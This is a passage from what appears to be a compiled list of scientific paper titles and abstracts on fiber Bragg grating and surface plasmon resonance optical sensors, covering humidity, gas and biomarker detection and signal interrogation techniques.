This new interrogation approach, based on the reflection spectrum, provides an improvement in the operating range of the device over previous techniques. The device allows detection of SPR in the reflected guided cladding modes and also in the transmitted spectrum, allowing comparison with standard techniques. The sensor has a large operating range from 1.335 to 1.432 RIU, and a sensitivity of 510.5 nm/RIU. The device shows strong dependence on the polarization state of the guided core mode, which can be used to turn the SPR on or off. --- paper_title: Tilted Fiber Bragg Grating Sensor with Graphene Oxide Coating for Humidity Sensing paper_content: In this study, we propose a tilted fiber Bragg grating (TFBG) humidity sensor fabricated using the phase mask method to produce a TFBG that was then etched with five different diameters of 20, 35, 50, 55 and 60 μm, after which piezoelectric inkjet technology was used to coat the grating with graphene oxide. According to the experimental results, the diameter of 20 μm yielded the best sensitivity. In addition, the experimental results showed that the wavelength sensitivity was −0.01 nm/%RH and the linearity was 0.996. Furthermore, the measurement results showed that when the relative humidity was increased, the refractive index of the sensor was decreased, meaning that the TFBG cladding mode spectrum wavelength was shifted. Therefore, the proposed graphene oxide film TFBG humidity sensor has good potential to be an effective relative humidity monitor. --- paper_title: Miniaturized Long-Period Fiber Grating Assisted Surface Plasmon Resonance Sensor paper_content: This paper presents the design and fabrication of a fiber-optic refractive index (RI) sensor. The novel concept employs a long-period fiber grating (LPG) to achieve surface plasmon resonance (SPR) of a single cladding mode at the gold-coated tip of a single-mode fiber. The sensor combines a high level of sensitivity, a miniaturized sensing area and simple intensity-based interrogation, and is intended for biosensing using portable point-of-care devices or highly integrated lab-on-chip systems. --- paper_title: Label-Free Detection of Cancer Biomarkers Using an In-Line Taper Fiber-Optic Interferometer and a Fiber Bragg Grating paper_content: A compact and label-free optical fiber sensor based on a taper interferometer cascaded with a fiber Bragg grating (FBG) is proposed and experimentally demonstrated for detection of a breast cancer biomarker (HER2). The tapered fiber-optic interferometer is extremely sensitive to the ambient refractive index (RI). In addition, being insensitive to RI variation, the FBG can be used as a thermometer owing to its independent response to temperature. Surface functionalization of the sensor is carried out to achieve specific targeting of the unlabeled biomarkers. The result shows that the proposed sensor presents a low limit of detection (LOD) of 2 ng/mL, demonstrating its potential for application in the early diagnosis of breast cancer. --- paper_title: Cladding mode coupling in highly localized fiber Bragg gratings: modal properties and transmission spectra paper_content: The spectral characteristics of a fiber Bragg grating (FBG) with a transversely inhomogeneous refractive index profile differ considerably from those of a transversely uniform one. Transmission spectra of inhomogeneous and asymmetric FBGs that have been inscribed with focused ultrashort pulses with the so-called point-by-point technique are investigated.
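The taper-interferometer plus FBG entry above relies on the two elements responding differently to refractive index and temperature. A standard way to exploit that, shown in the minimal sketch below with assumed (not measured) sensitivity coefficients, is to invert a 2x2 sensitivity matrix so that the two measured wavelength shifts are separated into an index change and a temperature change.

```python
# Minimal sketch of dual-parameter discrimination with a sensitivity matrix.
import numpy as np

# rows: [taper-interferometer dip, FBG peak]; columns: [dλ/dn (nm/RIU), dλ/dT (nm/°C)]
K = np.array([[1200.0, 0.010],    # taper dip: strongly index sensitive (assumed)
              [0.0,    0.011]])   # FBG: essentially index-insensitive (assumed)

dlam = np.array([0.36, 0.022])    # measured wavelength shifts (nm), illustrative

dn, dT = np.linalg.solve(K, dlam) # invert the sensitivity matrix
print(f"Δn ≈ {dn:.2e} RIU, ΔT ≈ {dT:.1f} °C")
```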
The cladding mode resonances of such FBGs can span a full octave in the spectrum and are very pronounced (deeper than 20dB). Using a coupled-mode approach, we compute the strength of resonant coupling and find that coupling into cladding modes of higher azimuthal order is very sensitive to the position of the modification in the core. Exploiting these properties allows precise control of such reflections and may lead to many new sensing applications. --- paper_title: A Novel Low-Power-Consumption All-Fiber-Optic Anemometer with Simple System Design paper_content: A compact and low-power consuming fiber-optic anemometer based on single-walled carbon nanotubes (SWCNTs) coated tilted fiber Bragg grating (TFBG) is presented. TFBG as a near infrared in-fiber sensing element is able to excite a number of cladding modes and radiation modes in the fiber and effectively couple light in the core to interact with the fiber surrounding mediums. It is an ideal in-fiber device used in a fiber hot-wire anemometer (HWA) as both coupling and sensing elements to simplify the sensing head structure. The fabricated TFBG was immobilized with an SWCNT film on the fiber surface. SWCNTs, a kind of innovative nanomaterial, were utilized as light-heat conversion medium instead of traditional metallic materials, due to its excellent infrared light absorption ability and competitive thermal conductivity. When the SWCNT film strongly absorbs the light in the fiber, the sensor head can be heated and form a "hot wire". As the sensor is put into wind field, the wind will take away the heat on the sensor resulting in a temperature variation that is then accurately measured by the TFBG. Benefited from the high coupling and absorption efficiency, the heating and sensing light source was shared with only one broadband light source (BBS) without any extra pumping laser complicating the system. This not only significantly reduces power consumption, but also simplifies the whole sensing system with lower cost. In experiments, the key parameters of the sensor, such as the film thickness and the inherent angle of the TFBG, were fully investigated. It was demonstrated that, under a very low BBS input power of 9.87 mW, a 0.100 nm wavelength response can still be detected as the wind speed changed from 0 to 2 m/s. In addition, the sensitivity was found to be -0.0346 nm/(m/s) under the wind speed of 1 m/s. The proposed simple and low-power-consumption wind speed sensing system exhibits promising potential for future long-term remote monitoring and on-chip sensing in practical applications. --- paper_title: Analysis of the Characteristics of PVA-Coated LPG-Based Sensors to Coating Thickness and Changes in the External Refractive Index paper_content: Recent research has shown that the transmission spectrum of a long period grating (LPG) written into an optical fiber is sensitive to the thickness and the refractive index (RI) of a thin layer deposited on it, a concept which forms the basis of a number of optical fiber sensors. The research reported herein is focused, in particular, on sensors of this type to create a design with an optimized thickness of the deposited layers of polyvinyl alcohol (PVA) on LPGs forming the basis of a highly sensitive probe. In creating such sensors, the dip-coating technique is used to minimize deleterious effects in the attenuation bands resulting from the inhomogeneity of the coated surface. 
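For context on why the attenuation bands and cladding-mode resonances discussed in the surrounding entries shift when a coating or the surrounding index changes, the sketch below evaluates the standard phase-matching conditions for long-period gratings and for FBG cladding-mode resonances. All effective indices and grating periods are illustrative assumptions, not values from the cited papers.

```python
# Minimal sketch of grating phase-matching conditions (illustrative values only).
n_core = 1.4460                    # effective index of the core mode (assumed)
n_clad = [1.4430, 1.4426]          # effective indices of two cladding modes (assumed)

lpg_period = 450e-6                # long-period grating pitch, 450 um (assumed)
fbg_period = 535e-9                # FBG pitch along the fiber axis, ~535 nm (assumed)

print(f"FBG core (Bragg) resonance ≈ {2 * n_core * fbg_period * 1e9:.1f} nm")
for i, nc in enumerate(n_clad, start=1):
    lam_lpg = (n_core - nc) * lpg_period * 1e9   # co-propagating coupling (LPG)
    lam_fbg = (n_core + nc) * fbg_period * 1e9   # counter-propagating coupling (FBG/TFBG)
    print(f"cladding mode {i}: LPG attenuation band ≈ {lam_lpg:.0f} nm, "
          f"FBG cladding resonance ≈ {lam_fbg:.1f} nm")
```

Any perturbation of the cladding-mode effective index moves these resonances, which is the sensing mechanism exploited in the entries above.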
In this paper, LPGs with different coating thicknesses are uniformly coated with thin layers of PVA and submerged in oils of known RI over the range from 1.30 to 1.70, to create effective RI probes. It is observed that when the coating thickness reaches a particular value that enables a substantial redistribution of the optical power within the overlay, a maximum sensitivity of the sensor can be achieved, even when the overlay has a RI higher than that of the cladding. The experimental results obtained through the characterization of the devices developed are shown to be in good agreement with the results of a theoretical model. --- paper_title: KLT-Based Interrogation Technique for FBG Multiplexed Sensor Tracking paper_content: The Karhunen–Loeve transform (KLT) is used to retrieve the wavelength information of several fiber Bragg gratings (FBGs) that are acting as a multiplexed sensor. The modulated light of a broadband source is launched to the FBG cascade in order to capture the electrical frequency response of the system. Thanks to dispersive media, the wavelengths of the FBGs are mapped in radio-frequency delays. Wavelength changes are determined by the amplitude change of the samples in the impulse response, a change which is followed by the eigenvalue calculated by the KLT routine. The use of the KLT routine reduces by three orders of magnitude the amount of points needed to have a subdegree resolution in temperature sensing, while keeping the accuracy almost intact. --- paper_title: Fiber grating assisted surface plasmon resonance for biochemical and electrochemical sensing paper_content: Surface Plasmon resonance (SPR) optical fiber sensors can be used as a cost-effective and relatively simple-toimplement alternative to well established bulky prism configurations for in-situ high sensitivity biochemical and electrochemical measurements. The miniaturized size and remote operation ability offer them a multitude of opportunities for single-point sensing in hard-to-reach spaces, even possibly in vivo. Grating-assisted and polarization control are two key properties of fiber-optic SPR sensors to achieve unprecedented sensitivities and limits of detection. The biosensor configuration presented here utilizes a nano-scale metal-coated tilted fiber Bragg grating (TFBG) imprinted in a commercial single mode fiber core with no structural modifications. Such sensor provides an additional resonant mechanism of high-density narrow cladding mode spectral combs that overlap with the broader absorption of the surface Plasmon for high accuracy interrogation. In this talk, we briefly review the principle, characterization and implementation of plasmonic TFBG sensors, followed by our recent developments of the “surface” and “localized” affinity studies of the biomolecules for real life problems, the electrochemical actives of electroactive biofilms for clean energy resources, and ultra-highly sensitive gas detection. --- paper_title: A novel immunosensor based on excessively tilted fiber grating coated with gold nanospheres improves the detection limit of Newcastle disease virus. paper_content: Abstract A novel immunosensor for detecting Newcastle disease virus (NDV) was developed using excessively tilted fiber grating (Ex-TFG) coated with gold nanospheres (AuNs). AuNs were coated on the Ex-TFG surface via Au–S bonds using 3-mercaptopropyltrimethoxysilane (MPTMS), and the activated staphylococcal protein A (SPA) was linked to AuNs by covalent bonds via cysteamine. 
AuNs greatly enhanced the impact of the analyte on the fiber cladding mode through the localized surface plasmon resonance (LSPR) effect, thus improving the detection limit and sensitivity of the immunosensor. Meanwhile, SPA enhanced the bioactivity of anti-NDV monoclonal antibodies (MAbs), thus promoting the effectiveness of specific binding events on the fiber surface. Immunoassays were performed by monitoring the resonance wavelength shift of the proposed sensor for NDV samples containing different particle amounts. Specificity was assessed, and clinical tests for NDV were performed by comparative experiments. Experimental results showed that the detection limit for NDV was improved about 5–10 times compared to that of the reference Ex-TFG without AuN treatment. Moreover, the novel biosensor was reusable and could potentially be applied in the clinic. --- paper_title: Graphene-Based Long-Period Fiber Grating Surface Plasmon Resonance Sensor for High-Sensitivity Gas Sensing paper_content: A graphene-based long-period fiber grating (LPFG) surface plasmon resonance (SPR) sensor is proposed. A monolayer of graphene is coated onto the Ag film surface of the LPFG SPR sensor, which increases the intensity of the evanescent field on the surface of the fiber and thereby enhances the interaction between the SPR wave and molecules. Such features significantly improve the sensitivity of the sensor. The experimental results demonstrate that the sensitivity of the graphene-based LPFG SPR sensor can reach 0.344 nm·%⁻¹ for methane, an improvement of 2.96 and 1.31 times with respect to the traditional LPFG sensor and the Ag-coated LPFG SPR sensor, respectively. Meanwhile, the graphene-based LPFG SPR sensor exhibits excellent response characteristics and repeatability. Such an SPR sensing scheme offers a promising platform to achieve high sensitivity for gas-sensing applications. --- paper_title: Optical hydrogen sensor based on etched fiber Bragg grating sputtered with Pd/Ag composite film paper_content: Abstract A novel optical fiber hydrogen sensor based on an etched fiber Bragg grating coated with Pd/Ag composite film is proposed in this paper. Pd/Ag composite films were deposited on the side face of an etched fiber Bragg grating (FBG) as sensing elements by a magnetron sputtering process. The atomic ratio of the two metals in the Pd/Ag composite film is controlled at Pd:Ag = 76:24. Compared to a standard FBG coated with the same hydrogen-sensitive film, the etched FBG significantly increases the sensor's sensitivity. When hydrogen concentrations are 4% in volume percentage, the wavelength shifts of FBG-125 μm, FBG-38 μm and FBG-20.6 μm are 8, 23 and 40 pm, respectively. The experimental results show that the sensor's hydrogen response is reversible, and the sensor has great potential for hydrogen measurement. --- paper_title: Cancer biomarker sensing using packaged plasmonic optical fiber gratings: Towards in vivo diagnosis. paper_content: This work presents the development of an innovative plasmonic optical fiber (OF) immunosensor for the detection of cytokeratin 17 (CK17), a biomarker of interest for lung cancer diagnosis. The development of this sensing platform is such that it can be assessed in non-liquid environments, demonstrating that a surface plasmon resonance (SPR) can be excited in this case. For this purpose, detections have been first carried out on CK17 encapsulated in gel matrix in the aim of mimicking tissue samples.
Gold-coated OF immunosensors were embedded in a specifically designed packaging providing enough stiffness to penetrate into soft matters. Resulting reflected spectra have revealed, for the first time, the presence of a stable SPR signal recorded in soft matters. Experiments conducted to detect CK17 trapped in a porous polyacrylamide gel matrix have highlighted the specific and selective biosensor response towards the target protein. Finally, the packaged OF immunosensor has been validated by a preliminary test on a human lung biopsy, which has confirmed the ex-vivo CK17 detection. Consequently, this work represents an important milestone towards the detection of biomarkers in tissues, which is still a clinical challenge for minimally-invasive in vivo medical diagnosis. --- paper_title: Optical bio-sensing devices based on etched fiber Bragg gratings coated with carbon nanotubes and graphene oxide along with a specific dendrimer paper_content: We demonstrate that etched fiber Bragg gratings (eFBGs) coated with single walled carbon nanotubes (SWNTs) and graphene oxide (GO) are highly sensitive and accurate biochemical sensors. Here, for detecting protein concanavalin A (Con A), mannose-functionalized poly(propyl ether imine) (PETIM) dendrimers (DMs) have been attached to the SWNTs (or GO) coated on the surface-modified eFBG. The dendrimers act as multivalent ligands, having specificity to detect lectin Con A. The specificity of the sensor is shown by a much weaker response (a factor of ~2500 for the SWNT- and ~2000 for the GO-coated eFBG) to the non-specific lectin peanut agglutinin. DM-functionalized, GO-coated eFBG sensors showed excellent specificity to Con A even in the presence of an excess amount of an interfering protein, bovine serum albumin. The shift in the Bragg wavelength (Δλ_B) with respect to the λ_B values of the SWNT (or GO)-DM coated eFBG for various concentrations of lectin follows a Langmuir-type adsorption isotherm, giving an affinity constant of ~4 × 10⁷ M⁻¹ for the SWNT-coated eFBG and ~3 × 10⁸ M⁻¹ for the GO-coated eFBG. --- paper_title: [INVITED] Tilted fiber grating mechanical and biochemical sensors paper_content: The tilted fiber Bragg grating (TFBG) is a new kind of fiber-optic sensor that possesses all the advantages of well-established Bragg grating technology in addition to being able to excite cladding modes resonantly. This device opens up a multitude of opportunities for single-point sensing in hard-to-reach spaces with very controllable cross-sensitivities, absolute and relative measurements of various parameters, and an extreme sensitivity to materials external to the fiber without requiring the fiber to be etched or tapered. Over the past five years, our research group has been developing multimodal fiber-optic sensors based on TFBG in various shapes and forms, always keeping the device itself simple to fabricate and compatible with low-cost manufacturing.
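The dendrimer-functionalized eFBG entry above extracts an affinity constant by fitting the Bragg wavelength shift versus analyte concentration with a Langmuir-type isotherm. A minimal fitting sketch of that procedure is given below; the concentration and shift values are invented for illustration, and SciPy is assumed to be available.

```python
# Minimal sketch: Langmuir isotherm fit to wavelength-shift data (illustrative values).
import numpy as np
from scipy.optimize import curve_fit

def langmuir(c, dlam_max, K):
    """Bragg wavelength shift vs analyte concentration for a Langmuir isotherm."""
    return dlam_max * K * c / (1.0 + K * c)

conc = np.array([1e-9, 5e-9, 2e-8, 1e-7, 5e-7, 2e-6])   # mol/L, assumed
dlam = np.array([0.01, 0.05, 0.14, 0.33, 0.46, 0.50])   # wavelength shift (nm), assumed

(dlam_max, K), _ = curve_fit(langmuir, conc, dlam, p0=(0.5, 1e7))
print(f"Δλ_max ≈ {dlam_max:.2f} nm, affinity constant K ≈ {K:.2e} L/mol")
```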
This paper presents a brief review of the principle, fabrication, characterization, and implementation of TFBGs, followed by our progress in TFBG sensors for mechanical and biochemical applications, including one-dimensional TFBG vibroscopes, accelerometers and micro-displacement sensors; two-dimensional TFBG vector vibroscopes and vector rotation sensors; reflective TFBG refractometers with in-fiber and fiber-to-fiber configurations; polarimetric and plasmonic TFBG biochemical sensors for in-situ detection of cell, protein and glucose. --- paper_title: Plasmonic nanoshell functionalized etched fiber Bragg gratings for highly sensitive refractive index measurements paper_content: A novel fiber optical refractive index sensor based on gold nanoshells immobilized on the surface of an etched single-mode fiber including a Bragg grating is demonstrated. The nanoparticle coating induces refractive index dependent waveguide losses, because of the variation of the evanescently guided part of the light. Hence the amplitude of the Bragg reflection is highly sensitive to refractive index changes of the surrounding medium. The nanoshell functionalized fiber optical refractive index sensor works in reflectance mode, is suitable for chemical and biochemical sensing, and shows an intensity dependency of 4400% per refractive index unit in the refractive index range between 1.333 and 1.346. Furthermore, the physical length of the sensor is smaller than 3 mm with a diameter of 6 μm, and therefore offers the possibility of a localized refractive index measurement. --- paper_title: Sensitivity-enhanced FBG demodulation system with multi-sideband filtering method paper_content: Abstract A multi-sideband filtering demodulation scheme with enhanced high sensitivity was proposed to demodulate weak fiber Bragg grating signals, and a novel data processing method was employed to reduce the influence of the background noise. The relationship of the sensing sensitivity, number of sidebands, and their slope coefficients were researched theoretically, numerically, and experimentally. The results showed that the sensing sensitivity was in proportion to the number of the sidebands and their slope coefficients. The power sensitivities for single and double CWDMs demodulating FBG in the experimental system were 6.960 dB/nm and 15.187 dB/nm, respectively, which were in agreement with the theoretical results. In addition, the data processing method we used to obtain the optical power was experimentally proven to be better than the method of directly measuring the optical power because it reduces the background noise. --- paper_title: Power-referenced refractometer with tilted fiber Bragg grating cascaded by chirped grating paper_content: Abstract A power-referenced refractometer operating in reflection mode is proposed and experimentally demonstrated based on a tilted-fiber Bragg grating (TFBG) cascaded by a reflection-band-matched chirped-fiber Bragg grating (CFBG). The optical signal reflected by the CFBG passes twice through the TFBG that enhances sensitivity of the refractometer. In addition, the optical signal is propagating all the way in the fiber core so that the extra insertion loss is low. Refractive index measurement with sensitivity up to 597.2 μW/R.I.U. is achieved within the range from 1.333 to ~1.42. The maximum detectable refractive index is ~1.45. 
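The multi-sideband entry above reports that the power sensitivity grows with the number of sideband filters and their slope coefficients. The sketch below shows the underlying slope-assisted (edge-filter) arithmetic: a wavelength shift is converted to a power change through the combined filter slope, and the power-reading noise divided by that slope sets the resolution. All numbers are illustrative assumptions.

```python
# Minimal sketch of slope-assisted (edge-filter) demodulation arithmetic.
slope_single = 6.96                      # filter slope (dB/nm) for one sideband filter (assumed)
n_filters = 2                            # number of cascaded sideband filters
slope_total = n_filters * slope_single   # idealised combined slope ≈ 13.9 dB/nm

measured_power_change_db = 0.35          # observed change of detected power (dB), illustrative
wavelength_shift_nm = measured_power_change_db / slope_total

power_noise_db = 0.01                    # rms noise of the power reading (dB), assumed
resolution_nm = power_noise_db / slope_total

print(f"wavelength shift ≈ {wavelength_shift_nm * 1e3:.1f} pm, "
      f"noise-limited resolution ≈ {resolution_nm * 1e3:.2f} pm")
```

The perfectly additive slope is an idealisation: the experiment quoted above measured 15.187 dB/nm for two filters rather than exactly twice the single-filter value, so in practice the combined slope is calibrated rather than assumed.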
--- paper_title: Plasmonic Fiber-Optic Refractometers Based on a High Q-Factor Amplitude Interrogation paper_content: A nano-scale gold-coated tilted fiber Bragg grating sensor with clear surface plasmon resonance is proposed and experimentally demonstrated. The transmission spectrum of the sensor provides a fine comb of narrowband resonances that overlap with the broader absorption of the surface plasmon and thus provides a unique tool to measure small shifts of the plasmon and identify the changes of the surrounding refractive index (SRI) with high accuracy. Meanwhile, our proposed sensor provides an amplitude interrogation method for SRI measurement, which is much simpler and cost-effective than the traditional wavelength monitoring. Experimental results obtained in sucrose solutions with different refractive indices ranging from 1.3330 to 1.3410 show that the sensitivities of our proposed sensor are 450 nm/RIU and 2040 dB/RIU by using the wavelength and amplitude interrogation methods, respectively. Furthermore, the Q-factor of amplitude interrogation signal has been increased from $\sim 70$ to $\sim 6000$ by using the narrowband cladding resonance instead of broader SPR absorption. --- paper_title: Narrowband interrogation of plasmonic optical fiber biosensors based on spectral combs paper_content: Abstract Gold-coated tilted fiber Bragg gratings can probe surface Plasmon polaritons with high resolution and sensitivity. In this work, we report two configurations to interrogate such plasmonic biosensors, with the aim of providing more efficient alternatives to the widespread spectrometer-based techniques. To this aim, the interrogation is based on measuring the optical power evolution of the cladding modes with respect to surrounding refractive index changes instead of computing their wavelength shift. Both setups are composed of a broadband source and a photodiode and enable a narrowband interrogation around the cladding mode that excites the surface Plasmon resonance. The first configuration makes use of a uniform fiber Bragg grating to filter the broadband response of the source in a way that the final interrogation is based on an intensity modulation measured in transmission. The second setup uses a uniform fiber grating too, but located beyond the sensor and acting as a selective optical mirror, so the interrogation is carried out in reflection. Both configurations are compared, showing interesting differential features. The first one exhibits a very high sensitivity while the second one has an almost temperature-insensitive behavior. Hence, the choice of the most appropriate method will be driven by the requirements of the target application. --- paper_title: Multiplexing of Surface Plasmon Resonance Sensing Devices on Etched Single-Mode Fiber paper_content: It is proposed the multiplexing of optical fiber-based surface plasmon resonance (SPR) sensors deployed in a ladder topology, addressed in wavelength by combining each sensor with specific fiber Bragg gratings (FBGs) and considering intensity interrogation. In each branch of the fiber layout, the FBGs are located after the sensor and the peak optical power reflected by the FBGs is a function of the relative spectral position between the SPR sensor and the FBG resonances, with the former dependent on the refractive index of the surrounding medium. 
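The amplitude-interrogation entry above quotes a Q-factor increase from about 70 to about 6000 when a narrow cladding resonance is tracked instead of the broad SPR envelope. Using the usual definition of Q as the centre wavelength divided by the linewidth, the short sketch below reproduces those orders of magnitude; the linewidths are back-of-envelope assumptions chosen for illustration, not measured values.

```python
# Minimal sketch: quality factor Q = centre wavelength / linewidth (assumed linewidths).
lambda_0 = 1550.0       # operating wavelength (nm)
fwhm_spr = 22.0         # width of the broad SPR absorption envelope (nm), assumed
fwhm_cladding = 0.26    # width of one narrowband cladding resonance (nm), assumed

print(f"Q of the SPR envelope       ≈ {lambda_0 / fwhm_spr:.0f}")      # ≈ 70
print(f"Q of the cladding resonance ≈ {lambda_0 / fwhm_cladding:.0f}") # ≈ 6000
```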
The concept is tested for the multiplexing of two SPR sensors fabricated in an etched region of a single-mode fiber showing intrinsic refractive index sensitivity up to 5000 nm/RIU, which translates into a sensitivity of ∼829 dB/RIU from the interrogation approach considered. The obtained refractive index resolution is in the order of 10−4 RIU, and the crosstalk level between the sensors was found negligible. --- paper_title: Fibre optic surface plasmon resonance sensor system designed for smartphones paper_content: A fibre optic surface plasmon resonance (SPR) sensor system for smartphones is reported, for the first time. The sensor was fabricated by using an easy-to-implement silver coating technique and by polishing both ends of a 400 µm optical fibre to obtain 45° end-faces. For excitation and interrogation of the SPR sensor system the flash-light and camera at the back side of the smartphone were employed, respectively. Consequently, no external electrical components are required for the operation of the sensor system developed. In a first application example a refractive index sensor was realised. The performance of the SPR sensor system was demonstrated by using different volume concentrations of glycerol solution. A sensitivity of 5.96·10−4 refractive index units (RIU)/pixel was obtained for a refractive index (RI) range from 1.33 to 1.36. In future implementations the reported sensor system could be integrated in a cover of a smartphone or used as a low-cost, portable point-of-care diagnostic platform. Consequently it offers the potential of monitoring a large variety of environmental or point-of-care parameters in combination with smartphones. --- paper_title: Surface Plasmon Resonances in Oriented Silver Nanowire Coatings on Optical Fibers paper_content: Silver nanowires 1–3 μm in length and diameters of 0.04–0.05 μm were synthesized by a polyol process and deposited on a single mode optical fiber with the Langmuir–Blodgett technique. For nanowire surface coverage of ∼40% and partial orientation of their long axis obtained by controlling the deposition parameters, the optical properties of the nanowire coating become identical to those of a uniform metal coating obtained by sputtering or evaporation. Excitation of the nanowires by the polarized evanescent field of fiber cladding modes at near-infrared wavelengths near 1.5 μm results in surface plasmon-like resonances in the transmission spectrum of the optical fiber. The polarization-dependent loss (PDL) spectrum of the tilted fiber Bragg grating used to excite the cladding modes shows a pronounced characteristic dip indicative of a plasmon resonance for radially polarized light waves and complete shielding of light for azimuthally polarized light. The PDL dip shifts at a rate of 650 nm/(refractive index ... --- paper_title: Analysis of a plasmonic based optical fiber optrode with phase interrogation paper_content: Optical fiber optrodes are attractive sensing devices due to their ability to perform point measurement in remote locations. Mostly, they are oriented to biochemical sensing, quite often supported by fluorescent and spectroscopic techniques, but with the refractometric approach considered as well when the objective is of high measurement performance, particularly when the focus is on enhancing the measurand resolution. In this work, we address this subject, proposing and analyzing the characteristics of a fiber optic optrode relying on plasmonic interaction. 
A linearly tapered optical fiber tip is covered by a double overlay: the inner one–a silver thin film and over it–a dielectric layer, with this combination allowing the structure to achieve, at a specific wavelength range, surface plasmonic resonance (SPR) interaction sensitive to the refractive index of the surrounding medium. Typically, the interrogation of SPR sensing structures is performed with spectroscopic techniques, but in principle a far better performance can be obtained by reading the phase of the light at a specific wavelength located within the spectral plasmonic resonance. This is the approach studied here in the context of the proposed optical fiber optrode configuration. The analysis performed shows that the combination of a silver inner layer with a dielectric titanium oxide layer with tuned thicknesses enables sensitive phase reading and allows the operation of the fiber optic optrode sensor in the third telecommunication wavelength window. --- paper_title: KLT-Based Interrogation Technique for FBG Multiplexed Sensor Tracking paper_content: The Karhunen–Loeve transform (KLT) is used to retrieve the wavelength information of several fiber Bragg gratings (FBGs) that are acting as a multiplexed sensor. The modulated light of a broadband source is launched to the FBG cascade in order to capture the electrical frequency response of the system. Thanks to dispersive media, the wavelengths of the FBGs are mapped into radio-frequency delays. Wavelength changes are determined by the amplitude change of the samples in the impulse response, a change that is tracked by the eigenvalue calculated by the KLT routine. The use of the KLT routine reduces by three orders of magnitude the number of points needed to have a subdegree resolution in temperature sensing, while keeping the accuracy almost intact. --- paper_title: Self-optimized metal coatings for fiber plasmonics by electroless deposition paper_content: We present a novel method to prepare optimized metal coatings for infrared Surface Plasmon Resonance (SPR) sensors by electroless plating. We show that Tilted Fiber Bragg grating sensors can be used to monitor in real time the growth of gold nano-films up to 70 nm in thickness and to stop the deposition of the gold at a thickness that maximizes the SPR (near 55 nm for sensors operating in the near infrared at wavelengths around 1550 nm). The deposited films are highly uniform around the fiber circumference and in spite of some nanoscale roughness (RMS surface roughness of 5.17 nm) the underlying gratings show high quality SPR responses in water. --- paper_title: Theoretical and experimental study of differential group delay and polarization dependent loss of Bragg gratings written in birefringent fiber paper_content: In this paper, we completely study the wavelength dependency of differential group delay (DGD) and polarization dependent loss (PDL) for Bragg gratings written in birefringent fibers. Based on the coupled mode theory, we present analytical expressions for the evolution with wavelength of the transmission coefficient, the DGD and the PDL. The wavelength dependencies of these evolutions on the birefringence are then discussed. Experimental results are finally presented for an apodized FBG written in a bow-tie fiber. A very good agreement between theory and experiment is reported, confirming the validity of the theoretical analysis.
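The KLT-based interrogation summarized above reduces the sampled impulse response to a single scalar: the dominant eigenvalue of its autocorrelation matrix, which follows the amplitude changes produced by FBG wavelength shifts. A minimal sketch of that computation is given below (Python/NumPy); the embedding order, sample length and the Gaussian test echoes are assumptions made for illustration, not values from the cited work.

import numpy as np

def klt_indicator(impulse_response, order=8):
    # Dominant KLT eigenvalue of a sampled impulse response: lagged segments
    # are stacked, their autocorrelation matrix is estimated, and the largest
    # eigenvalue serves as the scalar that tracks the FBG amplitude changes.
    x = np.asarray(impulse_response, dtype=float)
    x = x - x.mean()
    n = len(x) - order + 1
    segments = np.stack([x[i:i + order] for i in range(n)])
    r = segments.T @ segments / n            # empirical autocorrelation matrix
    eigvals = np.linalg.eigvalsh(r)          # symmetric matrix -> real eigenvalues
    return float(eigvals[-1])                # dominant eigenvalue

# Hypothetical usage: a reference echo and a slightly shifted, attenuated echo.
h_ref = np.exp(-0.5 * ((np.arange(200) - 80) / 5.0) ** 2)
h_new = 0.9 * np.exp(-0.5 * ((np.arange(200) - 83) / 5.0) ** 2)
print(klt_indicator(h_ref), klt_indicator(h_new))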
--- paper_title: Polarization-Assisted Fiber Bragg Grating Sensors: Tutorial and Review paper_content: Fiber Bragg gratings (FBGs) are inherently sensitive to temperature, axial strain, and pressure, which can be easily measured by a shift of the Bragg wavelength in their reflected/transmitted power spectrum. FBG sensors acquire many more additional sensing modalities and applications when the polarization of the interrogating light is controlled. For the polarization to have an effect, the cylindrical symmetry of the fiber must be broken, either by the structure of the fiber itself, by that of the FBG, or by the perturbation to be measured. Polarization control allows for sensing parameters that are spatially oriented, such as lateral force, bending or twist, and also for measurements of the properties of anisotropic media. Most importantly, polarization control enables high quality all-fiber surface plasmon resonance (SPR) FBG sensors and localized SPR-assisted sensing. This tutorial will cover the theory of polarized measurements in fiber gratings, their experimental implementation, and review a selection of the most important applications. --- paper_title: High resolution interrogation of tilted fiber grating SPR sensors from polarization properties measurement. paper_content: The generation of surface plasmon resonances (SPRs) in gold-coated weakly tilted fiber Bragg gratings (TFBGs) strongly depends on the state of polarization of the core guided light. Recently, it was demonstrated that rotating the linear state of polarization of the guided light by 90° with respect to the grating tilt makes it possible to turn the SPR on and off. In this work, we measure the Jones matrix associated with the TFBG transmission properties in order to be able to analyze different polarization-related parameters (i.e. dependency on wavelength of polarization dependent loss and first Stokes parameter). As they contain the information about the SPR, they can be used as a robust and accurate demodulation technique for refractometry purposes. Unlike other methods reported so far, a tight control of the input state of polarization is not required. The maximum error on refractive index measurement has been determined to be ~1 × 10^-5 refractive index unit (RIU), 5 times better than intensity-based measurements on the same sensors. --- paper_title: Cancer biomarker sensing using packaged plasmonic optical fiber gratings: Towards in vivo diagnosis. paper_content: This work presents the development of an innovative plasmonic optical fiber (OF) immunosensor for the detection of cytokeratin 17 (CK17), a biomarker of interest for lung cancer diagnosis. The development of this sensing platform is such that it can be assessed in non-liquid environments, demonstrating that a surface plasmon resonance (SPR) can be excited in this case. For this purpose, detections have been first carried out on CK17 encapsulated in gel matrix in the aim of mimicking tissue samples. Gold-coated OF immunosensors were embedded in a specifically designed packaging providing enough stiffness to penetrate into soft matters. Resulting reflected spectra have revealed, for the first time, the presence of a stable SPR signal recorded in soft matters. Experiments conducted to detect CK17 trapped in a porous polyacrylamide gel matrix have highlighted the specific and selective biosensor response towards the target protein.
Finally, the packaged OF immunosensor has been validated by a preliminary test on human lung biopsy, which has confirmed the ex-vivo CK17 detection. Consequently, this work represents an important milestone towards the detection of biomarkers in tissues, which is still a clinical challenge for minimally-invasive in vivo medical diagnosis. --- paper_title: Plasmonic nanoshell functionalized etched fiber Bragg gratings for highly sensitive refractive index measurements paper_content: A novel fiber optical refractive index sensor based on gold nanoshells immobilized on the surface of an etched single-mode fiber including a Bragg grating is demonstrated. The nanoparticle coating induces refractive index dependent waveguide losses, because of the variation of the evanescently guided part of the light. Hence the amplitude of the Bragg reflection is highly sensitive to refractive index changes of the surrounding medium. The nanoshell functionalized fiber optical refractive index sensor works in reflectance mode, is suitable for chemical and biochemical sensing, and shows an intensity dependency of 4400% per refractive index unit in the refractive index range between 1.333 and 1.346. Furthermore, the physical length of the sensor is smaller than 3 mm with a diameter of 6 μm, and therefore offers the possibility of a localized refractive index measurement. --- paper_title: Evanescent wave long-period fiber Bragg grating as 